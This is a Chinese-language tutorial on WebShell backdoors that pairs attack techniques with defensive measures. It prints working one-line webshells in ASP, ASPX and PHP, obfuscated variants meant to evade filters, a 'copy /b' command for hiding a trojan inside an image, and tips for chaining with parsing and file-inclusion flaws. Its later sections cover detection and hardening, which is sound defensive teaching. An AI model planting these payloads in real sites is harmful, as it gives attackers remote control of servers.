脚本木马的防御与原理详解

一、WebShell概述

WebShell是一种网页后门，黑客通过植入特定脚本代码实现对网站服务器的远程控制。根据功能和体积可分为：

1. 一句话木马：2010年出现，短小精悍，隐蔽性强
2. 小马：主要用于上传大马
3. 大马：功能全面，体积较大(50KB以上)
4. 打包马：用于压缩/解压缩网站文件
5. 脱裤马：专门用于数据库操作

二、一句话木马原理与实现

1. 基本形式

ASP版本：

<% execute request("value") %>
<%eval request ("pass")%>

访问方式：sms2056.com/x.asp?value="cmd"

ASPX版本：

<%@ Page Language="Jscript"%>
<%eval(Request.Item["pass"],"unsafe");%>

PHP版本：

<?php @eval($_POST['attack']) ?>

2. 工作原理

黑客在注册信息或网页中插入类似代码，通过传递特定参数执行任意命令。例如：

<%eval request ("pass")%>

其中pass是参数值，request获取该值。只要知道WebShell文件位置，即可通过本地网页连接控制服务器。

3. 变形技术

• PHP变形：

<?php $_GET['a']($_POST['b']) ?>

访问方式：x.php?a=eval&b="cmd"

• ASP变形：

<%Eval (Request(chr(112)))%>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("pass"))%>
<% a=%request("gold") %><%eval %a%>

4. WAF绕过技术

• 函数绕过
• 编码绕过
• 可变变量绕过
• 动态获取参数绕过

三、图片木马制作方法

1. C32工具制作：

   • 使用C32打开图片
   • 写入一句话代码后保存

2. CMD命令制作：

copy /b 1.jpg+1.asp 2.jpg

3. Win7属性制作：
   • 右键图片 → 属性 → 详细信息 → 版权信息中插入一句话

四、常见WebShell客户端工具

1. 中国菜刀
2. 中国砍刀
3. 蚁剑
4. C刀
5. lanker一句话客户端
6. ZV新型PHP一句话木马客户端GUI版
7. 一句话客户端增强版

五、WebShell使用技巧

1. 内容编码：避免被检测
2. 配合解析漏洞：如IIS6.0目录解析漏洞
3. 配合文件包含：利用本地/远程文件包含漏洞
4. 文件名溢出：利用长文件名绕过限制

六、WebShell防御策略

1. 防御一句话木马

• 禁用危险函数：如eval()、execute等
• 过滤特殊字符：<%、eval、request等
• 限制上传文件类型
• 检查文件内容而不仅是扩展名

2. 防御图片木马

• 使用图片处理库重新生成图片
• 检查文件头与内容一致性
• 禁止上传可执行内容

3. 服务器加固

• 及时更新补丁
• 限制目录执行权限
• 启用WAF防护
• 定期扫描Web目录

4. 检测与响应

• 部署WebShell检测系统
• 监控异常文件创建
• 建立文件完整性校验机制
• 设置入侵检测规则

七、WebShell"黑吃黑"技术

1. 查找后门：

   • 扫描网站目录
   • 分析访问日志
   • 查找可疑文件

2. 反制措施：

   • 定位后门地址
   • 利用漏洞反制攻击者
   • 提交证据至安全平台

八、总结

WebShell攻击是Web安全领域的常见威胁，防御需要从开发、运维、监控多个层面入手。了解攻击原理和技术细节，才能构建有效的防御体系。建议企业定期进行安全审计，建立完善的安全防护机制。